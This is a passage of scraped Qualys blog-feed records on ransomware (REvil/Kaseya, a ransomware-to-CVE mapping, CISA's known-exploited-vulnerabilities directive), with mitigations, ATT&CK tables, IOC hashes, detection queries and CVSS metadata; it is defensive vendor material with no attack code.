Encrypted for impact (T1486) \n| | | Masquerading (T1036)| | Defacement: Internal Defacement (T1491.001) \n| | | Masquerading: Rename System Utilities (T1036.003)| | \n| | | Hijack Execution Flow: DLL Side-Loading (T1574.002)| | \n| | | Subvert Trust Controls: Code Signing (T1553.002)| | \n| | | Impair Defenses: Disable or Modify System Firewall (T1562.004)| | \n| | | Virtualization/Sandbox Evasion: Time Based Evasion (T1497.003)| | \n| | | Modify Registry (T1112)| | \n| | | Impair Defenses: Disable or Modify Tools (T1562.001)| | \n \n### **Mitigation or **Additional Important Safety Measures\n\n#### Network\n\n * Keep strong and unique passwords for login accounts.\n * Disable RDP if not used. If required change the RDP port to a non-standard port.\n * Configure firewall in the following way:\n * Deny access to Public IPs to important ports (in this case RDP port 3389),\n * Allow access to only IPs which are under your control.\n * Use VPN to access the network, instead of exposing RDP to the Internet. Possibility to implement Two Factor Authentication (2FA).\n * Set lockout policy which hinders credentials guessing.\n * Create a separate network folder for each user when managing access to shared network folders.\n\n#### **Take regular data backup**\n\n * Protect systems from ransomware by periodically backing up important files regularly and keep a recent backup copy offline. Encrypt your backup.\n * If your computer gets infected with ransomware, your files can be restored from the offline backup once the malware has been removed.\n * Always use a combination of online and offline backup.\n * Do not keep offline backups connected to your system as this data could be encrypted when ransomware strike.\n\n#### **Keep software updated**\n\n * Always keep your security software (antivirus, firewall, etc.) up to date to protect your computer from new variants of malware.\n * Regularly patch and update applications, software, and operating systems to address any exploitable software vulnerabilities.\n * Do not download cracked/pirated software as they risk backdoor entry for malware into your computer.\n * Avoid downloading software from untrusted P2P or torrent sites. In most cases, they are malicious software.\n\n#### **Having minimum required privileges**\n\n * Do not assign Administrator privileges to users. Most importantly, do not stay logged in as an administrator unless it is strictly necessary. Also, avoid browsing, opening documents, or other regular work activities while logged in as an administrator. \n\n### Indicators of Compromise (IOCs)\n\nSHA256\n\nd55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e \n8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd \ne2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2\n\n### References\n\n * <https://us-cert.cisa.gov/ncas/current-activity/2021/07/02/kaseya-vsa-supply-chain-ransomware-attack>\n * [https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/ ](<https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/ \u2028>)\n * [https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/](<https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/\u2028>)\n * <https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident>\n * <https://www.tenable.com/blog/cve-2021-30116-multiple-zero-day-vulnerabilities-in-kaseya-vsa-exploited-to-distribute-ransomware>\n * <https://www.secureworks.com/research/threat-profiles/gold-southfield>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-07T23:41:59", "type": "qualysblog", "title": "Analyzing the REvil Ransomware Attack", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2021-07-07T23:41:59", "id": "QUALYSBLOG:894189F1B83B90193612FF586BF7576F", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-05T16:35:26", "description": "With most employees still working from remote locations, ransomware attacks have increased steadily since the early months of the Covid-19 pandemic. According to the FBI\u2019s 2020 Internet Crime Report 2400+ ransomware-related incidents in 2020 resulted in a loss of about 29 million dollars. These numbers are only getting worse and do not include damage from incidents not reported to the FBI.\n\nRansomware attacks affect various industries worldwide, and ransomware demands continue to increase. Some recent examples include:\n\n * [Conti Ransomware:](<https://us-cert.cisa.gov/ncas/alerts/aa21-265a>) Conti ransomware is spread using spear phishing campaigns through tailored emails that contain malicious attachments or malicious links and via stolen or weak Remote Desktop Protocol (RDP) credentials. \n * [Netfilm Ransomware](<https://blog.qualys.com/vulnerabilities-threat-research/2021/05/12/nefilim-ransomware>): Nefilim ransomware is distributed through exposed Remote Desktop Protocol (RDP) setups by brute-forcing them and using other known vulnerabilities for initial access, such as Citrix gateway devices.\n * [REvil Ransomware:](<https://blog.qualys.com/product-tech/2021/07/08/kaseya-revil-ransomware-attack-cve-2021-30116-automatically-discover-and-prioritize-using-qualys-vmdr>) REvil is a ransomware family that operates as ransomware-as-a-service (RaaS), has been linked to GOLD SOUTHFIELD, a financially motivated group, and was first identified in April 2019 according to MITRE.\n * [DarkSide Ransomware](<https://blog.qualys.com/vulnerabilities-threat-research/2021/06/09/darkside-ransomware>) : DarkSide ransomware performs brute force attacks and exploits known vulnerabilities in the remote desktop protocol (RDP) to gain initial access. DarkSide ransomware, first seen in August 2020 and updated as v2.0 in March 2021, is associated with the DarkSide group and now often operates as RaaS.\n * [Michigan State University (May 2020)](<https://www.zdnet.com/article/michigan-state-university-hit-by-ransomware-gang/>) - The MSU administrators were given a week to pay an undisclosed ransom demand to decrypt their files. In case MSU officials refuse to pay or choose to restore backups, the cybercriminals were prepared to leak documents stolen from the university's network on a special website the group is operating on the dark web.\n * [DearCry and Exchange vulnerabilities](<https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/>) - DearCry ransomware attacks exploited Microsoft Exchange Server vulnerabilities CVE-2021-26855 and CVE-2021-27065. These vulnerabilities were being widely exploited before patches were available. Forcing Microsoft to release out-of-band updates. \n * [Colonial Pipeline](<https://www.cnbc.com/2021/06/08/colonial-pipeline-ceo-testifies-on-first-hours-of-ransomware-attack.html>) - Colonial Pipeline was most likely target of ransomware attack due vulnerable, outdated version of Microsoft Exchange. Attackers potentially exploited these vulnerabilities, and as a result, Colonial Pipeline took its systems down to contain the threat, limiting gasoline supply to the east coast. \n\nAs seen above, industries ranging from education, manufacturing, electronics, research, health and more are impacted by ransomware.\n\nTo help organizations combat risks from ransomware, Qualys is introducing Ransomware Risk Assessment service. As outlined in [_our blog_](<https://blog.qualys.com/product-tech/2021/10/05/assess-risk-ransomware-attacks-qualys-research>), the Qualys Ransomware Risk Assessment & Remediation service leverages the security intelligence which is curated by Qualys Research experts to map ransomware families to specific vulnerabilities, misconfigurations, and vulnerable software. The Qualys Ransomware Risk Assessment service enables organizations to:\n\n * Get a unified view into critical ransomware exposures such as internet-facing vulnerabilities and misconfigurations, insecure remote desktop gateways (RDP), as well as detection of risky software in datacenter environment along with alerting for assets missing anti-malware solutions. \n * Accelerate remediation of Ransomware exposure~~s~~ with zero-touch patching by continuously patching ransomware-vulnerabilities as they are detected. The remediation plan also enables proactive patching for prioritized software to help you keep software up to date. \n\n#### **Ransomware Infection Vectors**\n\nAlthough cyber criminals use a variety of techniques to infect victims with ransomware, the most common means of infection are: \n\n * **Remote Desktop Protocol** (RDP) vulnerabilities: RDP allows individuals to see and control the system remotely. It is a very common practice in organizations as it provides easy access to systems remotely. Once cybercriminals have RDP access, they can deploy malicious software on the system, making it inaccessible to legitimate users unless the victim pays the demanded ransom. Shodan search shows currently open and potentially vulnerable RDP services on the internet, and you can buy RDP access for [as low as US$3](<https://www.bankinfosecurity.com/how-much-that-rdp-credential-in-window-a-10590>). \n\n![](https://blog.qualys.com/wp-content/uploads/2021/09/Picture1.png)\n\n * **Email phishing campaigns**: Email is a prevalent medium to get malware into the target environment. Cybercriminals use emails to send malicious links to deploy malware on recipients\u2019 machines. It allows cybercriminals to steal sensitive data without breaking through network security and is very common among cybercriminals. \n * **Software vulnerabilities**: Software vulnerabilities are even more prevalent than phishing. Client- and server-side vulnerabilities allow criminals to take advantage of security weaknesses in widely used software programs, gain control of victim systems, and deploy ransomware. Vulnerabilities in VPN systems such as Pulse Secure VPN and Fortinet are common targets as well.\n\n#### **Ransomware Attacks and Exact CVEs To Prioritize for Monitoring**\n\nAs mentioned above known vulnerabilities and weakness are one of the top infection vectors. \n\nQualys research team has performed extensive research on 36 prevalent ransomware families and have mapped them to 64 CVEs and the 247 QIDs that can detect them. The following is just a sample list of some of most widely used ransomware in the attacks along with the CVEs leveraged to infect systems. \n\n**Ransomware**| **Description**| **CVE (s)**| QID (s) \n---|---|---|--- \nConti | The Conti ransomware strain will not only encrypt important files but will also exfiltrate them to a location controlled by the attacker. This method of extortion-ware is used to force victims to pay the ransom in order to avoid the sensitive data from being leaked. Conti operators are known to use well-known hacking tools such as Mimikatz and Cobalt Strike leading up to the encryption of files | CVE-2020-1472, CVE-2021-34527, \nCVE-2017-0143, CVE-2017-0144, CVE-2017-0145 | 91680, \n91668, \n91785, \n91345, \n91360 \nTeslacrypt, PrincessLocker | TeslaCrypt ransomware was uploaded to VirusTotal in November 2014 but was more widely spread in early 2015 and continues to evolve. TeslaCrypt encrypts the files using AES-256 algorithm until the victim pays the ransom in either Bitcoin or Cash Cards. | CVE-2013-2551, CVE-2015-8651 | 168351, 168350, 124422, 168341, 168340, 100271, 124421 \nLocky, Cerber | Cerber ransomware is ransomware-as-a-service (RaaS), meaning an attacker can distribute the licensed copy of this ransomware over the internet and pay commissions to the developer. | CVE-2016-1019 | 256924, 256922, 177873, 176784, 296029, 296028, 170815, 170724, 170711, 170365, 256256, 170264, 236438, 170119, 256214, 170052, 276628, 236342, 157445, 169942, 169941, 169923, 276572, 169854, 169853, 176004, 196742, 196725, 370320, 276455, 175965, 168848, 168813, 168792, 168696, 168694, 168594, 100282, 124879, 124872 \nWannaCry, Badrabbit | The WannaCry ransomware \u2014 formally known as WanaCrypt0r 2.0 \u2014 spreads using an exploit called EternalBlue for a Windows OS vulnerability that Microsoft patched in March 2017. | CVE-2017-0145 | 91361, 91360, 91359, 91347, 91345 \nDearCRy, BlackKingdom | DearCry takes advantage of compromised Microsoft Exchange Servers with vulnerability CVE-2021-26855. When exploited, cybercriminals gain initial access to the Exchange Server and then install web shells. | CVE-2021-26855 | 50107, 50108 \n \n### Unified View of Critical Ransomware Risk Exposures\n\nIt is a daunting task to get a unified view of multiple critical ransomware exposures together such as internet-facing vulnerabilities, misconfigurations as well as unauthorized software. Qualys Ransomware Risk Assessment & remediation service dashboard enables security teams to see all the internet-facing assets that are exposed to ransomware related vulnerability or misconfiguration and take needed actions in the most impactful way. It also enables users to measure and track their effectiveness at addressing vulnerabilities or misconfigurations before they are used for ransomware attacks. \n\n![](https://blog.qualys.com/wp-content/uploads/2021/09/qualys-ransomware-screenshot-1-1070x795.png)\n\nIn addition, organizations should implement a good cyber hygiene program to scan vulnerabilities, discovery misconfigurations regularly with sufficient detection capabilities such as QIDs enabled, as well as an efficient automated process to deploy important security patches on targeted assets quickly with the scalability needed. \n\n### Qualys Ransomware Risk Assessment & Remediation Service\n\nQualys provides an all-in-one solution to discover, assess, prioritize, monitor, and patch critical vulnerabilities in real time and across your global hybrid-IT landscape. The following sections provide an overview of each of the critical components from Qualys product portfolio and how they can be uniquely valuable in the effort of combatting ransomware attacks. \n\n#### Detect your critical data assets & monitor security blind-spots with CyberSecurity Asset Management (CSAM) \n\nEnables organizations to automatically discover every asset in their environment, including unmanaged assets appearing on the network, inventory all hardware and software, and classify and tag critical assets. \n\n#### Discover, Inventory and Categorize assets \n\nIt is important to know your blind spots to protect against ransomware. Use CSAM to discover all assets, including the ones that are exposed to the internet as well as unknown/unmanaged assets that are connecting to your network. \n\nCSAM automatically organizes your assets by their functional category by analyzing their hardware and installed software. Extends your inventory by incorporating key business information from your CMDB, such as status, environment, ownership, support groups, and business criticality.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/10/Picture1.png)\n\n#### Monitor & detect at-risk assets and applications - Assets missing Anti-virus, running unauthorized software \n\nCSAM enriches your asset inventory with in-context, relevant information to help you detect at-risk assets and applications. You can identify and set alerts for assets that are running unauthorized software or are not using anti-virus/endpoint security tools. \n\n * Unauthorized software should be removed to quickly reduce unnecessary attack vectors. With CSAM you can easily define rules to monitor unauthorized software installations. \n * Identify assets missing required security software, such as Antivirus and Endpoint Protection. \n * Identify EOL/EOS software, which can be used as ransomware attack vectors. End-of-Support software is one of the first things hackers look to exploit because they know publishers are no longer providing security updates and patches. \n\n#### Monitor & detect at-risk assets and applications - Assets missing Anti-virus, running unauthorized software \n\nCSAM enriches your asset inventory with in-context, relevant information to help you detect at-risk assets and applications. You can identify and set alerts for assets that are running unauthorized software or are not using anti-virus/endpoint security tools. \n\n * Unauthorized software should be removed to quickly reduce unnecessary attack vectors. With CSAM you can easily define rules to monitor unauthorized software installations. \n * Identify assets missing required security software, such as Antivirus and Endpoint Protection. \n * Identify EOL/EOS software, which can be used as ransomware attack vectors. End-of-Support software is one of the first things hackers look to exploit because they know publishers are no longer providing security updates and patches. \n\n![](https://blog.qualys.com/wp-content/uploads/2021/10/Picture2.png)\n\n### Continuous detection & prioritization for Ransomware-specific vulnerabilities with VMDR \n\nThe first step in managing vulnerabilities and reducing risk is identification of assets. [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) makes it easy to identify systems with open ports. For example, hosts with Remote Desktop Protocol (RDP) enabled. \n\n_operatingSystem.category1:`Windows` and openPorts.port:`3389`_ \n\n![](https://blog.qualys.com/wp-content/uploads/2021/09/Picture2.png)\n\nOnce the hosts with RDP are identified, they can be grouped together with a \u2018dynamic tag\u2019, let us say \u2013 \u201cRDP Asset\u201d. This helps in automatically grouping existing hosts with this vulnerability as well as any new hosts that spin up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>). \n\n### **Discover and Prioritize Ransomware Vulnerabilities** \n\nNow that hosts with \u201cRDP\u201d are identified, you want to detect which of these assets have flagged this vulnerability. VMDR automatically detects new vulnerabilities like Windows RDP, Exchange Server vulnerability and more based on the always updated Knowledgebase. \n\nYou can see all your impacted hosts for this vulnerability tagged with the \u2018Ransomware asset tag in the vulnerabilities view by using this QQL query: \n\n**vulnerabilities.vulnerability.threatIntel.ransomware: true** \n\nOr \n\n**vulnerabilities.vulnerability.ransomware.name:WannaCry** \n\nThis will return a list of all impacted hosts. \n\n![](https://blog.qualys.com/wp-content/uploads/2021/10/Picture4-1070x377.png)\n\nUsing VMDR prioritization, the ransomware vulnerabilities can be easily prioritized using \u201cRansomware\u201d Real-Time Threat Intelligence: \n\n![](https://blog.qualys.com/wp-content/uploads/2021/09/Picture4.png)\n\nVMDR also enables you to stay on top of these threats proactively via the \u2018live threat feed\u2019 provided for threat prioritization. With \u2018live feed\u2019 updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats. \n\nSimply click on the impacted assets for the \u201cRansomware\u201d feeds to see the vulnerability and impacted host details.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/10/Picture6.png)\n\nQualys provides the ability for a Unified Dashboard approach with the key metrics across all Apps providing key metrics against your overall security posture against Ransomware Related data points such as: \n\n * Ransomware Related vulnerabilities \n * Unauthorized Software \n * Misconfigurations leveraged by ransomware \n * Internet Facing Hosts with RDP vulnerabilities and many more\u2026 \n\nThe Unified Dashboard enabled you to track your ransomware exposure, against impacted hosts, their status, and overall management in real-time. \n\n### **Discover and Mitigate Ransomware Misconfigurations such as SMB, Insecure RDP** \n \n\n[Qualys Policy Compliance](<https://www.qualys.com/apps/policy-compliance/>) provides the Ransomware Best Practices policy which contains the critical controls mapped to MITRE ATT&CK mitigations and tactics recommended by [CISA](<https://us-cert.cisa.gov/ncas/alerts/aa21-131a>) and best practices published by [Fireye Mandiant](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/wp-ransomware-protection-and-containment-strategies.pdf>). These mitigations are effective across top techniques and can potentially reduce the risk of ransomware attacks. These critical controls can limit attacker initial access and the lateral movement around the network. \n\nAs organizations look to prevent the attacks from happening in the first place, security teams should focus on implementing these controls proactively and effectively across all assets to reduce the risk. By automating the configuration assessment with Qualys Policy Compliance, organizations can ensure golden images to conform to security baselines and prevent images from ever having misconfigurations and identify configurations drifts to prevent security risks. \n\n#### **Mitigation or Important Precautionary Measures and Controls ** \n\nThe Qualys internal research team has identified top five security measures and configuration controls; a security team should consider for their organization to prevent business interruption from a ransomware attack. Research is based on best practices published by FireEye (Mandiant), Cybersecurity and Infrastructure Security Agency (CISA), and CISA MS-ISAC. Policies/technical controls should be implemented. These configuration checks go beyond typical CIS or DISA benchmarks. \n \n\n 1. Enforce Password Policies. e.g. \n * Minimum password age should be set, \n * Password complexity requirements should be enabled. \n * Enforce password history restrictions. \n 2. Employ best practices for use of Remote Desktop protocol e. g \n * Disable RDP services if not necessary. \n * Close unused RDP ports, Audit the network for systems using RDP. \n * Apply Multifactor authentication. \n * Disable or block Server Message Block (SMB) protocol and remove or disable outdated versions of SMB. \n * RDP account controls \n 3. Employ Network security and Firewalls e.g. \n * Enforce firewall policy rules. \n * Deny all rule and allow only required networks, access. \n * Common ports and protocols that should be blocked. \n 4. Enforce Account Use Policies. E.g. \n * Apply account lockouts after a specified number of attempts. \n * Admin approval requirements. \n * Apply UAC restrictions on network logons etc. \n * Least privileges are assigned to users. \n 5. Keep Software Updated \n * Ensure automatic updates are enabled. \n * Patches, software\u2019s should be installed and updated in a timely manner which includes operating systems, applications, etc. \n\n![](https://blog.qualys.com/wp-content/uploads/2021/10/Picture7-1070x578.png)\n\nQualys research has mapped misconfigurations to the relevant MITRE ATTACK techniques (summarized in the table below) to define 237 configuration checks across five security areas such as RDP hardening, user controls, network, protocol and port configuration security, share and password policies and software update policies, essentially helping organizations proactively prevent 20 attack techniques leveraged in ransomware attacks. \n \n\n**TTP Map** \n\nInitial Access (TA0001)| Credential Access (TA0006)| Privilege Escalation (TA0004)| Execution (TA0002)| Defense Evasion (TA0005)| Lateral Movement (TA0008)| Command and Control (TA0011)| Impact (TA0040) \n---|---|---|---|---|---|---|--- \nValid Accounts (T1078)| Brute Force(T1110)| Abuse Elevation Control Mechanism (T1548)| Scheduled Task / Job (T1053)| Impair Defenses (T1562)| Remote Services (T1021)| Non-Application Layer Protocol (T1095)| Data Manipulation: Transmitted Data Manipulation (T1565.002) \nSupply Chain Compromise (T1195)| | Abuse Elevation Control Mechanism: Bypass User Account Control (T1548.002)| Inter-Process Communication (T1559)| Trusted Developer Utilities Proxy Execution (T1127)| Exploitation of Remote Services (T1210)| | \nSupply Chain Compromise: Compromise Software Dependencies and Development Tools (T1195.001)| | Access Token Manipulation (T1134)| | | Remote Services (T1021)| | \n | Unsecured Credentials (T1552)| | | | Remote Services: Remote Desktop Protocol (T1021.001)| | \n | | | | | Remote Services: Remote Desktop Protocol (T1021.002)| | \n | | | | | Remote Service Session Hijacking (T1563)| | \n \n### **Automated Proactive & Reactive Patching for Ransomware vulnerabilities ** \n\nTo keep the ransomware vulnerability patches always up to date on your assets, we strongly encourage users to take advantage of Qualys Zero-Touch Patch that allows users to automatically patch new ransomware-related vulnerabilities which are actively used in attacks. Qualys Zero-Touch Patch enables businesses to patch and address at least 97% of the ransomware related vulnerabilities. Faster and at scale! For more information on Qualys automatic patch capabilities, refer to blog [Automate Vulnerability Remediation with Proactive Zero-Touch Patch](<https://blog.qualys.com/product-tech/2021/09/14/optimize-vulnerability-remediation-with-zero-touch-patch>). \n\nFollowing patch management best practices, using Qualys Patch Management, allows organizations to proactively remediate vulnerabilities related to ransomware and therefore minimize ransomware attacks in their environment. A simple and efficient way to use Qualys patch management to remediate ransomware related vulnerabilities is to leverage the VMDR prioritization report, as described in a previous section, this report can be used to detect assets with ransomware related vulnerabilities. The tight integration between Qualys VMDR and Patch Management allows customers to add those ransomware related vulnerabilities directly from the prioritization report into a patch job. The Qualys engine will automatically map the selected vulnerabilities to the relevant patches, in the customer\u2019s environment, that are required to remediate the vulnerabilities. This will allow IT teams to focus on deploying those patch jobs without the need to worry about researching vulnerabilities and manually finding the relevant patches for those vulnerabilities.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/10/Picture8-1070x791.png)\n\n### **Ready to Learn more and see for yourself?** \n\n[Join the webinar](<https://event.on24.com/wcc/r/3433269/88DA8B72F4DE260B0DE22B7E5632ACBB>), Combating Risk from Ransomware Attacks, to discuss the current state of ransomware and prevention techniques. Webinar October 21, 2021, at 10am Pacific. Sign up now! \n\n**Resources** \n \n\n * [Press Release](<https://www.qualys.com/company/newsroom/news-releases/usa/qualys-launches-ransomware-risk-assessment-service/>) \n * [Ransomware Assessment Service Video](<https://vimeo.com/617379785/>) \n * [Research Powered Qualys Ransomware Risk Assessment & Remediation service](<https://blog.qualys.com/product-tech/2021/10/05/assess-risk-ransomware-attacks-qualys-research>) \n * [Try Qualys Ransomware Risk Assessment Service](<https://www.qualys.com/forms/ransomware/>) \n * Learn more about the research and see the Qualys Ransomware Risk Assessment & Remediation service in action by attending the [webinar](<https://event.on24.com/wcc/r/3433269/88DA8B72F4DE260B0DE22B7E5632ACBB>) \n\n### References\n\n<https://www.ic3.gov/Content/PDF/Ransomware_Fact_Sheet.pdf> <https://www.ic3.gov/Media/Y2019/PSA191002> <https://www.ic3.gov/Media/PDF/AnnualReport/2020_IC3Report.pdf>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-05T12:50:00", "type": "qualysblog", "title": "The Rise of Ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2551", "CVE-2015-8651", "CVE-2016-1019", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2020-1472", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-30116", "CVE-2021-34527"], "modified": "2021-10-05T12:50:00", "id": "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), "Reducing the Significant Risk of Known Exploited Vulnerabilities." [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update agency internal vulnerability management procedures within 60 days according to this directive and remediate each vulnerability according to the timelines outlined in 'CISA's vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations' digital infrastructure and automate remediation. Qualys' guidance for rapid response to Operational Directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency's behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA's public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) are already past due. These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 (34%) Vulnerabilities need to be patched in the next two weeks, or by **November 17, 2022**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months or by **May 3, 2022**.\n\n## Detect CISA's Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ `CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture1.jpg)\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture2.jpg)\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture3.png)\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and gather your status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the ["CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES"](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture4.png)\n\n### Summary Dashboard High Level Structured by 